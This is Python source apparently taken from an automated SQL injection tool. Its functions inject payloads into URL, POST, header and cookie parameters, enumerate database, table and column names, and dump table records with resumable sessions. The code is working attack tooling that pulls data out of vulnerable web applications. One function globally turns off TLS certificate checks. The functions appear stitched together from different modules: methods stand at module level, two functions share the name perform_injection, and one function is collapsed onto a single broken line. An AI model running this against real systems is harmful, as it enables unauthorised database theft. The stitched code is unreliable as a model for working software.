def parse_http_response(resp):
    """Normalise a requests or urllib response object into one namedtuple.

    A requests.Response is recognised by its ``text`` attribute; anything
    else is treated as a urllib response (file-like, with geturl()/info()).
    """
    Response = collections.namedtuple(
        "Response",
        ["ok", "url", "text", "headers", "status_code", "reason", "error"])
    if hasattr(resp, "text"):
        # requests.Response
        text, url = resp.text, resp.url
        status_code, reason = resp.status_code, resp.reason
        headers = resp.headers
    else:
        # urllib response object
        text = unescape_html(resp)
        url = resp.geturl()
        status_code = resp.status
        reason = resp.reason
        headers = dict(resp.info())
    return Response(
        ok=status_code == 200,
        url=url,
        text=text,
        headers=headers,
        status_code=status_code,
        reason=reason,
        error=f"{status_code} ({reason})",
    )
def parse_http_error(error):
    """Normalise an HTTP error (requests HTTPError or urllib error) into a namedtuple."""
    Response = collections.namedtuple(
        "Response",
        ["url", "text", "headers", "status_code", "reason", "error"])
    if hasattr(error, "response"):
        # requests.exceptions.HTTPError carries the original response
        resp = error.response
        text = unescape_html(resp)
        status_code = resp.status_code
        reason = resp.reason
        headers = resp.headers
        url = resp.url
    else:
        # urllib's HTTPError is itself a file-like response object
        text = unescape_html(error)
        status_code = error.code
        reason = error.reason
        headers = dict(error.info())
        url = error.geturl()
    return Response(
        url=url,
        text=text,
        headers=headers,
        status_code=status_code,
        reason=reason,
        error=f"{status_code} ({reason})",
    )
def prepare_payloads(prefixes, suffixes, payloads, techniques=""):
    """Expand payload templates with every prefix/suffix combination.

    Args:
        prefixes: iterable of payload prefixes.
        suffixes: iterable of payload suffixes.
        payloads: list of dicts, each carrying "order" and "payloads" keys.
        techniques: optional string of technique letters (e.g. "XEF") used
            to filter entries by their "order" value.

    Returns:
        The filtered entries with their "payloads" value replaced by
        Payload namedtuples (url-encoded prefix, suffix, full string).
    """
    Payload = collections.namedtuple("Payload", ["prefix", "suffix", "string"])
    urle = compat_urlencode
    techniques_dict = {
        "X": [1, 2, 3],
        "E": [4, 5],
        "F": [6, 7, 8, 9],
        "D": [10],
        "B": [11],
        "G": [12, 13],
        "J": [14, 15],
    }
    techniques_to_test = []
    if techniques:
        # plain loop instead of a side-effect list comprehension; unknown
        # technique letters are now skipped instead of raising TypeError
        # (dict.get() returned None which crashed list.extend)
        for letter in techniques.strip():
            techniques_to_test.extend(techniques_dict.get(letter, []))
        techniques_to_test.append(16)
    _temp = []
    for entry in payloads:
        order = entry.get("order")
        if techniques and techniques_to_test and order not in techniques_to_test:
            continue
        pl = [
            Payload(prefix=urle(i), suffix=k, string=f"{i}{j}{k}")
            for i in prefixes
            for j in entry.get("payloads")
            for k in suffixes
        ]
        entry.update({"payloads": pl})
        _temp.append(entry)
    return _temp
def prepare_proxy(proxy):
    """Build proxy settings for both transports from a single proxy URL.

    Returns a namedtuple (for_requests, for_urllib); both fields are None
    when no proxy was supplied.
    """
    Response = collections.namedtuple("Response", ["for_requests", "for_urllib"])
    if not proxy:
        return Response(for_requests=None, for_urllib=None)
    mapping = {"http": proxy, "https": proxy}
    return Response(for_requests=mapping, for_urllib=ProxyHandler(mapping))
def _fallback_check(self, payload, count, unknown_error_counter=0):
    """Retry one payload (with url-encoding fallback) and report the outcome.

    Returns a PayloadResponse namedtuple; ``is_injected`` is True only
    when the injected request succeeded.
    """
    PayloadResponse = collections.namedtuple(
        "PayloadResponse",
        ["is_injected", "status_code", "result", "payload", "payloads_count", "error"],
    )
    status_code, error = None, None
    logger.payload(f"{payload}")
    req = prepare_payload_request(
        self, payload, unknown_error_counter=unknown_error_counter)
    try:
        response = request.inject_payload(
            url=req.url,
            regex=req.regex,
            data=req.data,
            headers=req.headers,
            proxy=self._proxy,
        )
        status_code = response.status_code
        error = response.error
        if response.ok:
            return PayloadResponse(
                is_injected=True,
                status_code=status_code,
                result=response.result,
                payload=payload,
                payloads_count=count,
                error=error,
            )
    except KeyboardInterrupt:
        logger.error("user interrupted")
        logger.end("ending")
        exit(0)
    return PayloadResponse(
        is_injected=False,
        status_code=status_code,
        result="",
        payload="",
        payloads_count=count,
        error=error,
    )
def _search_column(self, payload, index, database="", table=""):
    """Resolve missing database/table context, then extract a column name.

    When database and/or table are not supplied they are first recovered
    via the corresponding search helpers before the column payload is
    injected. Removed: a block of dead commented-out code and the no-op
    ``database = database`` assignment.
    """
    Response = collections.namedtuple("Response", ["database", "table", "column"])
    if not database and not table:
        response = self._search_table(payload, index, get_tbl=True)
        database = response.database
        table = response.table
    elif not database and table:
        response = self._search_db(payload, index, get_db=True)
        database = response.database
    elif database and not table:
        response = self._search_table(payload, index, database=database, get_tbl=True)
        table = response.table
    url = self.url
    data = self.data
    regex = self.regex
    headers = self.headers
    it = self._injection_type.upper()
    if "GET" in it:
        url = self._perpare_querystring(self.url, payload)
    if "POST" in it:
        data = self._perpare_querystring(self.data, payload)
    if "HEADER" in it or "COOKIE" in it:
        headers = self._perpare_querystring(self.headers, payload)
    column = self.perform_injection(url, data, headers, regex, index, search_type="column")
    return Response(database=database, table=table, column=column)
def _extract_search_results(self,
                            payloads,
                            database="",
                            table="",
                            search_type="",
                            records=None,
                            position=0):
    """Run search payloads one by one and collect db/table/column hits.

    Args:
        payloads: prepared payloads, one request per entry.
        database, table: context for table/column searches.
        search_type: one of "database", "table", "column".
        records: previously fetched entries when resuming; each supplies
            the database/table context for one payload.
        position: offset already covered by a resumed session.

    Returns:
        namedtuple (is_fetched, result); result holds one response per
        successfully processed payload.
    """
    _temp, index = [], 0
    pos = position + 1
    resumed = bool(records)
    Response = collections.namedtuple("Response", ["is_fetched", "result"])
    while index < len(payloads):
        payload = payloads[index]
        if records:
            # NOTE(review): pop() consumes resumed entries from the END of
            # the list — confirm the caller supplies them in reverse order.
            entry = records.pop()
            database = entry.database
            table = entry.table
        try:
            if search_type == "database":
                response = self._search_db(payload=payload, index=pos)
                _temp.append(response)
            if search_type == "table":
                response = self._search_table(payload=payload,
                                              index=pos,
                                              database=database)
                _temp.append(response)
            if search_type == "column":
                response = self._search_column(payload=payload,
                                               index=pos,
                                               database=database,
                                               table=table)
                _temp.append(response)
        except KeyboardInterrupt:
            logger.warning(
                "user aborted during enumeration. Xpath will display partial output"
            )
            break
        index += 1
        pos += 1
        if resumed:
            # context came from the resumed record; clear it so the next
            # iteration takes its context from the next popped record
            database = ""
            table = ""
    if _temp:
        resp = Response(is_fetched=True, result=_temp)
    else:
        resp = Response(is_fetched=False, result=_temp)
    return resp
def prettifier(cursor_or_list, field_names="", header=False):
    """Render rows into a left-aligned PrettyTable and count the entries.

    Returns a namedtuple (data, entries) where ``data`` is the table and
    ``entries`` the number of rows added.
    """
    Prettified = collections.namedtuple("Prettified", ["data", "entries"])
    fields = re.sub(" +", "", field_names).split(",") if field_names else []
    table = PrettyTable(field_names=fields if fields else [""])
    table.align = "l"
    table.header = header
    entries = 0
    for row in cursor_or_list:
        # bare strings become single-column rows
        if row and isinstance(row, str):
            row = (row, )
        table.add_row(row)
        entries += 1
    return Prettified(data=table, entries=entries)
def prepare_payload_request(self, payload, unknown_error_counter=0):
    """Inject *payload* into the request part that matches the injection type.

    Returns a namedtuple (url, data, regex, headers) where exactly the
    part(s) matching ``self._injection_type`` carry the payload.
    """
    Response = collections.namedtuple("Response", ["url", "data", "regex", "headers"])
    url, data = self.url, self.data
    regex, headers = self.regex, self.headers
    injection_type = self._injection_type.upper()
    if "GET" in injection_type or "URI" in injection_type:
        url = self._perpare_querystring(
            self.url, payload, unknown_error_counter=unknown_error_counter)
    if "POST" in injection_type:
        data = self._perpare_querystring(
            self.data, payload, unknown_error_counter=unknown_error_counter)
    if "HEADER" in injection_type or "COOKIE" in injection_type:
        headers = self._perpare_querystring(
            self.headers, payload, unknown_error_counter=unknown_error_counter)
    return Response(url=url, data=data, regex=regex, headers=headers)
def _extract_tbls(self, payloads, database=""):
    """Run table-name extraction payloads and persist hits to the session.

    Returns a namedtuple (is_fetched, result) where result is the
    de-duplicated list of retrieved table names.
    """
    Response = collections.namedtuple("Response", ["is_fetched", "result"])
    _temp, index = [], 0
    while index < len(payloads):
        payload = payloads[index]
        payload_request = prepare_payload_request(self, payload)
        url = payload_request.url
        data = payload_request.data
        regex = payload_request.regex
        headers = payload_request.headers
        try:
            response = request.inject_payload(url=url,
                                              regex=regex,
                                              data=data,
                                              headers=headers,
                                              proxy=self._proxy)
        except KeyboardInterrupt:
            logger.warning(
                "user aborted during enumeration. Xpath will display partial output"
            )
            break
        else:
            if response.ok:
                result = response.result
                logger.info("retrieved: '%s'" % (result))
                _temp.append(result)
                retval = session.dump(
                    session_filepath=self.session_filepath,
                    query=TBLS_STATEMENT.format(tbl_name=database, tblname=result),
                )
        index += 1
    if _temp:
        # de-duplicate (set() does not preserve order)
        _temp = list(set(_temp))
        resp = Response(is_fetched=True, result=_temp)
    else:
        # consistency fix: both branches previously returned
        # is_fetched=True; sibling extractors report False when nothing
        # was retrieved, so do the same here
        resp = Response(is_fetched=False, result=_temp)
    return resp
def _format_results(self, results, steps): chunks = [results[x:x + steps] for x in range(0, len(results), steps)] _temp = [] Results = collections.namedtuple("Results", ["database", "table", "column"]) for chunk in chunks: tt = {"database": "", "table": "", "column": ""} if len(chunk) == 3: tt.update({ "database": chunk[0], "table": chunk[1], "column": chunk[2] }) if len(chunk) == 2: tt.update({"database": chunk[0], "table": chunk[1]}) if len(chunk) == 1: tt.update({"database": chunk[0]}) _temp.append( Results(database=tt["database"], table=tt["table"], column=tt["column"])) return _temp
def prepare_request(url, data, custom_headers, use_requests=False):
    """Build the raw HTTP request text and a normalised header structure.

    Ensures User-agent and Host headers are present, then returns a
    namedtuple (raw, headers): ``raw`` is the request as it appears on
    the wire (for traffic logging); ``headers`` is a list of
    (name, value) tuples for urllib or a dict for requests.
    """
    Response = collections.namedtuple("Response", ["raw", "headers"])
    request_type = "POST" if url and data else "GET"
    parsed = urlparse.urlparse(url)
    path = parsed.path if not parsed.query else f"{parsed.path}?{parsed.query}"
    if not path:
        path = "/"
    if not custom_headers:
        custom_headers = f"User-agent: {useragent}"
    if custom_headers and "user-agent" not in custom_headers.lower():
        custom_headers += f"\nUser-agent: {useragent}"
    if custom_headers and "host" not in custom_headers.lower():
        custom_headers += f"\nHost: {parsed.netloc}"
    custom_headers = "\n".join(
        [entry.strip() for entry in custom_headers.split("\n") if entry])
    raw = f"{request_type} {path} HTTP/1.1\n"
    raw += f"{custom_headers if custom_headers else ''}\n"
    if data:
        raw += f"\n{data}\n"
    header = {}
    for line in custom_headers.split("\n"):
        # BUG FIX: split only on the first ':' so header values that
        # themselves contain ':' (e.g. "Host: example.com:8080", full
        # referer URLs) are kept; the old split(":") produced >2 parts
        # and silently dropped such headers
        name, sep, value = line.partition(":")
        if sep:
            header.update({name.strip(): value.strip()})
    if not use_requests:
        custom_headers = [(key, value) for key, value in header.items()]
    else:
        custom_headers = header
    return Response(raw=raw, headers=custom_headers)
def _search_table(self, payload, index, database="", get_tbl=False):
    """Extract a table name (recovering its database first when missing).

    Removed: a block of dead commented-out querystring-preparation code
    superseded by the injection-type dispatch below.
    """
    Response = collections.namedtuple("Response", ["database", "table"])
    if not database:
        response = self._search_db(payload, index, get_db=True)
        database = response.database
    if get_tbl:
        payload = self._payload_for(payload=payload, value_type="TABLE_NAME")
    url = self.url
    data = self.data
    regex = self.regex
    headers = self.headers
    it = self._injection_type.upper()
    if "GET" in it:
        url = self._perpare_querystring(self.url, payload)
    if "POST" in it:
        data = self._perpare_querystring(self.data, payload)
    if "HEADER" in it or "COOKIE" in it:
        headers = self._perpare_querystring(self.headers, payload)
    table = self.perform_injection(url, data, headers, regex, index, search_type="table")
    return Response(database=database, table=table)
def _search_db(self, payload, index, get_db=False):
    """Extract a database (schema) name via the injected payload.

    Removed: a block of dead commented-out querystring-preparation code
    superseded by the injection-type dispatch below.
    """
    Response = collections.namedtuple("Response", ["database"])
    if get_db:
        payload = self._payload_for(payload=payload, value_type="TABLE_SCHEMA")
    url = self.url
    data = self.data
    regex = self.regex
    headers = self.headers
    it = self._injection_type.upper()
    if "GET" in it:
        url = self._perpare_querystring(self.url, payload)
    if "POST" in it:
        data = self._perpare_querystring(self.data, payload)
    if "HEADER" in it or "COOKIE" in it:
        headers = self._perpare_querystring(self.headers, payload)
    database = self.perform_injection(url, data, headers, regex, index, search_type="database")
    return Response(database=database)
def perform(
    self,
    url,
    data="",
    headers="",
    timeout=30,
    use_requests=False,
    connection_test=False,
    proxy=None,
):
    """Fire a single HTTP request and return a normalised Response.

    The request goes through urllib by default or through the requests
    library when ``use_requests`` is True. HTTP error statuses are turned
    into a Response with ``ok=True`` and ``error_msg`` filled so callers
    can still inspect the error page body (needed for error-based
    injection); all other exceptions propagate.

    Args:
        url: target URL.
        data: POST body; an empty string means a GET request.
        headers: raw header text ("Name: value" lines).
        timeout: socket timeout in seconds.
        use_requests: switch transport from urllib to requests.
        connection_test: kept for interface compatibility (the flag it
            used to set was never read).
        proxy: namedtuple from prepare_proxy(), or None.
    """
    Response = collections.namedtuple("Response", [
        "ok", "url", "status_code", "text", "headers", "reason", "error_msg"
    ])
    ok = False
    text = None
    reason = ""
    error_msg = ""
    response_url = ""
    # placeholder result in case neither request branch runs
    http_response = Response(
        ok=ok,
        url=response_url,
        text=text,
        status_code="",
        headers=headers,
        reason="",
        error_msg=error_msg,
    )
    req = prepare_request(url=url,
                          data=data,
                          custom_headers=headers,
                          use_requests=use_requests)
    raw = req.raw
    custom_headers = req.headers
    logger.traffic_out(f"HTTP request:\n{raw}")
    headers = {}
    # pick the proxy representation matching the transport in use
    if proxy and proxy.for_urllib and not use_requests:
        proxy = proxy.for_urllib
    elif proxy and proxy.for_requests and use_requests:
        proxy = proxy.for_requests
    else:
        proxy = None
    if not data:
        # GET request
        try:
            if not use_requests:
                opener = compat_opener(proxy) if proxy else compat_opener()
                opener.addheaders = custom_headers
                resp = opener.open(url, timeout=timeout)
            else:
                resp = requests.get(url,
                                    headers=custom_headers,
                                    proxies=proxy,
                                    timeout=timeout)
                resp.raise_for_status()
            parsed = parse_http_response(resp)
            http_response = Response(
                ok=parsed.ok,
                url=parsed.url,
                text=parsed.text,
                status_code=parsed.status_code,
                headers=parsed.headers,
                reason=parsed.reason,
                error_msg=error_msg,
            )
        except (compat_httperr, requests.exceptions.HTTPError) as e:
            # error pages are still useful payload carriers: ok=True
            parsed = parse_http_error(e)
            http_response = Response(
                ok=True,
                url=parsed.url,
                text=parsed.text,
                status_code=parsed.status_code,
                headers=parsed.headers,
                reason=parsed.reason,
                error_msg=parsed.error,
            )
    if data:
        # POST request
        try:
            if not use_requests:
                data = data.encode("utf-8")
                opener = compat_opener(proxy) if proxy else compat_opener()
                opener.addheaders = custom_headers
                resp = opener.open(url, data, timeout=timeout)
            else:
                # BUG FIX: was requests.get(); a request carrying a body
                # must be sent as POST — the urllib branch above already
                # POSTs and prepare_request() labels this request POST
                resp = requests.post(
                    url,
                    data=data,
                    headers=custom_headers,
                    proxies=proxy,
                    timeout=timeout,
                )
                resp.raise_for_status()
            parsed = parse_http_response(resp)
            http_response = Response(
                ok=parsed.ok,
                url=parsed.url,
                text=parsed.text,
                status_code=parsed.status_code,
                headers=parsed.headers,
                reason=parsed.reason,
                error_msg=error_msg,
            )
        except (compat_httperr, requests.exceptions.HTTPError) as e:
            parsed = parse_http_error(e)
            http_response = Response(
                ok=True,
                url=parsed.url,
                text=parsed.text,
                status_code=parsed.status_code,
                headers=parsed.headers,
                reason=parsed.reason,
                error_msg=parsed.error,
            )
    raw_response = prepare_response(http_response)
    logger.traffic_in(f"HTTP Response {raw_response}")
    return http_response
def _extact(self, payloads):
    """Try each payload in turn until one injects successfully.

    On an unexpected request failure the same payload is retried via
    _fallback_check with URL encoding applied. Returns a PayloadResponse
    namedtuple: is_injected=True carries the working payload and its
    result; otherwise the last status code/error seen are reported.
    """
    PayloadResponse = collections.namedtuple(
        "PayloadResponse",
        ["is_injected", "status_code", "result", "payload", "payloads_count", "error"],
    )
    payloads_count = len(payloads)
    status_code = None
    error = None
    unknown_error_counter = 0
    for payload in payloads:
        logger.payload(f"{payload}")
        payload_request = prepare_payload_request(self, payload)
        url = payload_request.url
        data = payload_request.data
        regex = payload_request.regex
        headers = payload_request.headers
        try:
            response = request.inject_payload(url=url,
                                              regex=regex,
                                              data=data,
                                              headers=headers,
                                              proxy=self._proxy)
        except KeyboardInterrupt:
            logger.error("user interrupted")
            logger.end("ending")
            exit(0)
        except Exception:
            # BUG FIX: was a bare `except:` which also swallowed
            # SystemExit/GeneratorExit; the intent is only to retry the
            # payload with url encoding on request-level failures
            unknown_error_counter += 1
            logger.debug("trying again the same payload with url encoding..")
            resp = self._fallback_check(
                payload,
                payloads_count,
                unknown_error_counter=unknown_error_counter)
            if resp.is_injected:
                return resp
        else:
            if response.ok:
                result = response.result
                status_code = response.status_code
                error = response.error
                return PayloadResponse(
                    is_injected=True,
                    status_code=status_code,
                    result=result,
                    payload=payload,
                    payloads_count=payloads_count,
                    error=error,
                )
            else:
                status_code = response.status_code
                error = response.error
    return PayloadResponse(
        is_injected=False,
        status_code=status_code,
        result="",
        payload="",
        payloads_count=payloads_count,
        error=error,
    )
def _extract_data(self, payloads, table=None, columns=None, fetched_records=None, count=None):
    """Extract record values cell by cell and persist them to the session.

    Args:
        payloads: dict mapping a record index to a list of per-column
            payload dicts ({"column": ..., "payload": ...}).
        table: target table name (used to build the session table name).
        columns: column names passed through to _save_records.
        fetched_records: values already recovered when resuming.
        count: zero-padded column-count prefix for the session table.

    Returns:
        namedtuple (is_fetched, result) where result is a list of
        {"index", "column_name", "column_value"} dicts.
    """
    _temp, is_interrupted = [], False
    Response = collections.namedtuple("Response", ["is_fetched", "result"])
    for index, values in payloads.items():
        # per-record accumulator; seeded with resumed values if present
        __temp = [] if not fetched_records else fetched_records
        position = 0
        while position < len(values):
            p = values[position]
            name = p.get("column")
            payload = p.get("payload")
            payload_request = prepare_payload_request(self, payload)
            url = payload_request.url
            data = payload_request.data
            regex = payload_request.regex
            headers = payload_request.headers
            try:
                response = request.inject_payload(
                    url=url,
                    regex=regex,
                    data=data,
                    headers=headers,
                    proxy=self._proxy,
                )
            except KeyboardInterrupt:
                logger.warning(
                    "user aborted during enumeration. Xpath will display partial output"
                )
                is_interrupted = True
                break
            else:
                if response.ok:
                    result = response.result
                    logger.info(
                        "retrieved: '%s'" %
                        (result if result != "<blank_value>" else ""))
                    _temp.append({
                        "index": index + 1,
                        "column_name": name,
                        "column_value": result,
                    })
                    __temp.append(result)
                    # persist each extracted cell immediately so the run
                    # can be resumed later
                    table_name = f"{count}_{table}_tmp"
                    PREPARED_STATEMENT = f"INSERT INTO `{table_name}` (`index`, `column_name`, `column_value`) VALUES (?, ?, ?);"
                    retval = session.dump(
                        session_filepath=self.session_filepath,
                        query=PREPARED_STATEMENT,
                        values=(index + 1, name, result),
                    )
            position += 1
        _ = self._save_records(table=table,
                               column_names=columns,
                               records=__temp,
                               count=count)
        if is_interrupted:
            break
    if _temp and len(_temp) > 0:
        resp = Response(is_fetched=True, result=_temp)
    else:
        resp = Response(is_fetched=False, result=_temp)
    return resp
def data_dump(self, db="", tbl="", cols=""):
    """Dump records for the given columns of ``db``.``tbl``.

    Resumes from the session file when partial data was extracted in a
    prior run. Returns a RecordsResponse namedtuple
    (fetched, count, database, table, columns, records).
    """
    index = 0
    _temp = []
    is_resumed = False
    fetched_data = {}
    _temp_payloads = []
    fetched_records = []
    cols = self._clean_up_cols(cols)
    # zero-padded column count, used to namespace session table names
    count = "{0:03d}".format(len(cols))
    RecordsResponse = collections.namedtuple(
        "RecordsResponse",
        ["fetched", "count", "database", "table", "columns", "records"],
    )
    if db and tbl and cols and isinstance(cols, list):
        dump_payloads = []
        [dump_payloads.extend(v) for _, v in PAYLOADS_RECS_DUMP.items()]
        # marker column used to probe for a working dump payload
        # (hex-encoded string by default, numeric when the DBMS is known)
        test_column = "0x72306f746833783439"
        if self._dbms:
            dump_payloads = PAYLOADS_RECS_DUMP.get(self._dbms, dump_payloads)
            test_column = "1337"
        for i in dump_payloads:
            data = i.format(col=test_column, db=db, tbl=tbl)
            _temp_payloads.append(data)
        try:
            # resume: load whatever was already dumped in a prior run
            tmp_table_name = f"{count}_{tbl.strip()}_tmp"
            fetched_data = session.fetch_from_table(
                session_filepath=self.session_filepath,
                table_name=tmp_table_name,
                group_by_columns="`index`,`column_name`,`column_value`",
                cursor=False,
            )
            if fetched_data:
                is_resumed = True
        except Exception as error:
            # best-effort: a missing session table simply means no resume
            pass
        logger.info(
            "fetching column(s) '%s' for table '%s' in database: '%s'" %
            (", ".join(cols), tbl, db))
        last_seen = 0
        remainder = 0
        retval = self._data_count(db=db, tbl=tbl)
        if retval.is_injected:
            data_count = int(retval.result)
            if data_count != 0:
                logger.info("used SQL query returns %d entries" % (data_count))
            if data_count == 0:
                logger.warning(
                    "used SQL query returns %d entries of columns '%s' for table '%s' in database '%s'"
                    % (data_count, ", ".join(cols), tbl, db))
                return RecordsResponse(
                    fetched=False,
                    count=data_count,
                    database=db,
                    table=tbl,
                    columns=cols,
                    records=[],
                )
            if is_resumed:
                _temp = fetched_data
                for entry in fetched_data:
                    last_seen = index = entry.get("index")
                    value = entry.get("column_value")
                    # logger.info(f"resumed: '{value}'")
                    fetched_records.append(value)
                # a partially dumped record must be re-fetched from the
                # point where the previous run stopped
                remainder = len(fetched_data) % len(cols)
                if remainder > 0:
                    index -= 1
                    last_seen = last_seen - 1
                    fetched_records = fetched_records[-remainder:]
            should_fetch = True
            if is_resumed:
                if index == data_count:
                    should_fetch = False
            if should_fetch:
                # logger.info(f"resumed fetching from '{index+1}' record..")
                payloads = self._generat_payload(payloads_list=_temp_payloads)
                retval = self._extact(payloads=payloads)
                if retval.is_injected:
                    payload = clean_up_payload(payload=retval.payload,
                                               replace_with="{col}")
                    payloads = self._generate_data_payloads(
                        data_count=data_count,
                        payload=payload,
                        cols=cols,
                        index=index)
                    if is_resumed and remainder > 0:
                        # skip the columns of the partial record that were
                        # already saved in the session
                        remaing_records = payloads[last_seen][remainder:]
                        payloads.update({last_seen: remaing_records})
                    if not is_resumed:
                        self.__generate_records_tables(tbl=tbl,
                                                       cols=cols,
                                                       count=count)
                    response_data = self._extract_data(
                        payloads=payloads,
                        table=tbl,
                        columns=cols,
                        fetched_records=fetched_records,
                        count=count,
                    )
                    if response_data.is_fetched:
                        _temp.extend(response_data.result)
                    table_name = f"{count}_{tbl}_data"
                    self._pprint_records(
                        field_names=", ".join(cols),
                        database=db,
                        table_name=table_name,
                        table=tbl,
                        columns=cols,
                    )
                    return RecordsResponse(
                        fetched=True,
                        count=data_count,
                        database=db,
                        table=tbl,
                        columns=cols,
                        records=_temp,
                    )
                if not retval.is_injected:
                    status_code = retval.status_code
                    error = retval.error
                    count = retval.payloads_count
                    if status_code not in [200, 0]:
                        message = f"{error} - {count} times"
                        logger.warning(
                            f"HTTP error codes detected during run:\n{message}"
                        )
                    else:
                        message = f"tested with '{count}' queries, unable to find working SQL query."
                        logger.critical(message)
            else:
                # everything already in the session — just pretty-print it
                table_name = f"{count}_{tbl}_data"
                self._pprint_records(
                    field_names=", ".join(cols),
                    database=db,
                    table_name=table_name,
                    table=tbl,
                    columns=cols,
                )
                return RecordsResponse(
                    fetched=True,
                    count=data_count,
                    database=db,
                    table=tbl,
                    columns=cols,
                    records=_temp,
                )
        if not retval.is_injected:
            status_code = retval.status_code
            error = retval.error
            count = retval.payloads_count
            if status_code not in [200, 0]:
                message = f"{error} - {count} times"
                logger.warning(
                    f"HTTP error codes detected during run:\n{message}")
            else:
                message = (
                    f"tested with '{count}' queries, unable to find working SQL query."
                )
                logger.critical(message)
    return RecordsResponse(
        fetched=False,
        count=0,
        database=None,
        table=None,
        columns=None,
        records=None,
    )
def dbs_names(self):
    """Enumerate database names, resuming from the session when possible.

    Returns a DatabasesResponse namedtuple (fetched, count, databases).
    """
    is_resumed = False
    index = 0
    fetched_data = {}
    _temp = []
    DatabasesResponse = collections.namedtuple(
        "DatabasesResponse", ["fetched", "count", "databases"])
    try:
        # resume: names already extracted by a previous run
        fetched_data = session.fetch_from_table(
            session_filepath=self.session_filepath,
            table_name="tbl_databases",
            cursor=False,
        )
        if fetched_data:
            is_resumed = True
    except Exception as error:
        # best-effort: a missing session table simply means no resume
        pass
    logger.info("fetching database names")
    retval = self._dbs_count
    if retval.is_injected:
        dbs_count = int(retval.result)
        if dbs_count != 0:
            logger.info("used SQL query returns %d entries" % (dbs_count))
        if dbs_count == 0:
            logger.warning(
                "used SQL query returns %d entries for database names.." %
                (dbs_count))
            return DatabasesResponse(fetched=False,
                                     count=dbs_count,
                                     databases=[])
        if is_resumed:
            for entry in fetched_data:
                name = entry.get("dbname")
                if name not in _temp:
                    _temp.append(name)
                    # logger.info(f"resumed: '{name}'")
                index += 1
        should_fetch = True
        if is_resumed:
            if len(fetched_data) == dbs_count:
                should_fetch = False
        if should_fetch:
            payloads = self._generat_payload(
                payloads_list=PAYLOADS_DBS_NAMES)
            retval = self._extact(payloads=payloads)
            if retval.is_injected:
                payload = retval.payload
                payloads = self._generate_dbs_payloads(dbs_count=dbs_count,
                                                       payload=payload,
                                                       index=index)
                response_data = self._extract_dbs(payloads=payloads)
                if response_data.is_fetched:
                    _temp.extend(response_data.result)
                self._available_dbs(dbs_count, _temp)
                return DatabasesResponse(fetched=True,
                                         count=dbs_count,
                                         databases=_temp)
            if not retval.is_injected:
                status_code = retval.status_code
                error = retval.error
                count = retval.payloads_count
                if status_code not in [200, 0]:
                    message = f"{error} - {count} times"
                    logger.warning(
                        f"HTTP error codes detected during run:\n{message}"
                    )
                else:
                    message = f"tested with '{count}' queries, unable to find working SQL query."
                    logger.critical(message)
        else:
            # every name already recovered from the session
            self._available_dbs(dbs_count, _temp)
            return DatabasesResponse(fetched=True,
                                     count=dbs_count,
                                     databases=_temp)
    if not retval.is_injected:
        status_code = retval.status_code
        error = retval.error
        count = retval.payloads_count
        if status_code not in [200, 0]:
            message = f"{error} - {count} times"
            logger.warning(
                f"HTTP error codes detected during run:\n{message}")
        else:
            message = (
                f"tested with '{count}' queries, unable to find working SQL query."
            )
            logger.critical(message)
    return DatabasesResponse(fetched=False, count=0, databases=_temp)
def perform_injection(
    url="",
    data="",
    host="",
    header="",
    cookies="",
    headers="",
    referer="",
    user_agent="",
    level=1,
    verbosity=1,
    techniques="",
    batch=False,
    flush_session=False,
    proxy=None,
    force_ssl=False,
):
    """Entry point: configure logging/session/proxy and run the SQLi test.

    Args mirror the CLI options: target url/data, header injection
    sources, test level (1=GET/POST, 2=Cookie, 3=other headers),
    verbosity (1-5), technique letters, batch mode, session flushing,
    proxy URL and SSL-verification toggle.

    Returns:
        Response namedtuple describing the detected injection.
    """
    verbose_levels = {
        1: logging.INFO,
        2: logging.DEBUG,
        3: logging.PAYLOAD,
        4: logging.TRAFFIC_OUT,
        5: logging.TRAFFIC_IN,
    }
    if not force_ssl:
        # monkeypatch: globally disable TLS certificate verification
        ssl._create_default_https_context = ssl._create_unverified_context
    if proxy:
        proxy = prepare_proxy(proxy)
    verbose_level = verbose_levels.get(verbosity, logging.INFO)
    session_path = session.generate_filepath(url, flush_session=flush_session)
    filepath = os.path.join(session_path, "log")
    set_level(verbose_level, filepath)
    if not url.startswith("http"):
        # accept scheme-less and protocol-relative target URLs
        url = f"http://{url}" if not url.startswith("//") else f"http:{url}"
    logger.start("starting")
    Response = collections.namedtuple(
        "Response",
        [
            "is_injected",
            "payloads",
            "dbms",
            "filepath",
            "headers",
            "proxy",
            "injection_type",
            "injected_param",
            "session_filepath",
            "recommended_payload",
            "recommended_payload_type",
        ],
    )
    custom_headers = prepare_custom_headers(
        host=host,
        header=header,
        cookies=cookies,
        headers=headers,
        referer=referer,
        user_agent=user_agent,
    )
    levels = {2: "Cookie", 3: "HEADER"}
    if url and not data:
        injection_type = "GET"
    if url and data:
        injection_type = "POST"
    if level == 1:
        # auto-upgrade the level when a '*' marker appears in a header value
        if cookies and "*" in cookies:
            level = 2
        if (headers and "*" in headers or referer and "*" in referer
                or user_agent and "*" in user_agent):
            level = 3
        if level in [2, 3]:
            injection_type = levels.get(level)
    elif level in [2, 3]:
        injection_type = levels.get(level)
    sqli = SQLitest(
        url=url,
        data=data,
        headers=custom_headers,
        filepath=session_path,
        injection_type=injection_type,
        techniques=techniques,
        batch=batch,
        proxy=proxy,
    )
    resp = sqli.perform()
    # carry forward any cookies/headers discovered during testing
    if resp.cookies:
        custom_headers += f"\n{resp.cookies}"
    if resp.headers:
        custom_headers += f"\n{resp.headers}"
    if resp.injection_type and resp.injection_type != injection_type:
        injection_type = resp.injection_type
    resp = Response(
        is_injected=resp.is_vulnerable,
        payloads=resp.payloads,
        dbms=resp.dbms,
        filepath=resp.filepath,
        headers=custom_headers,
        proxy=proxy,
        injection_type=injection_type,
        injected_param=resp.injected_param,
        session_filepath=resp.session_filepath,
        recommended_payload=resp.recommended_payload,
        recommended_payload_type=resp.recommended_payload_type,
    )
    return resp
def _search_payloads(self, db="", tbl="", col="", search_type=""):
    """Build COUNT and DUMP payload sets for search-style lookups.

    Depending on ``search_type`` ("database" | "table" | "column") and
    which of db/tbl/col are supplied, a LIKE-based WHERE clause is
    assembled; values are hex-encoded to avoid quoting issues.

    Returns:
        Payloads namedtuple (for_count, for_dump, table_to_generate).
    """
    Payloads = collections.namedtuple(
        "Payloads", ["for_count", "for_dump", "table_to_generate"])
    count_payloads, dump_payloads = [], []
    QUERY_COUNT = ""
    QUERY_DUMP = ""
    table_to_generate = ""
    if search_type == "database":
        table_to_generate = f"{db}_{search_type}"
        logger.info(f"searching databases LIKE '{db}'")
        count_payloads = PAYLOAD_SCHEMA_SEARCH_COUNT
        dump_payloads = PAYLOAD_SCHEMA_SEARCH_DUMP
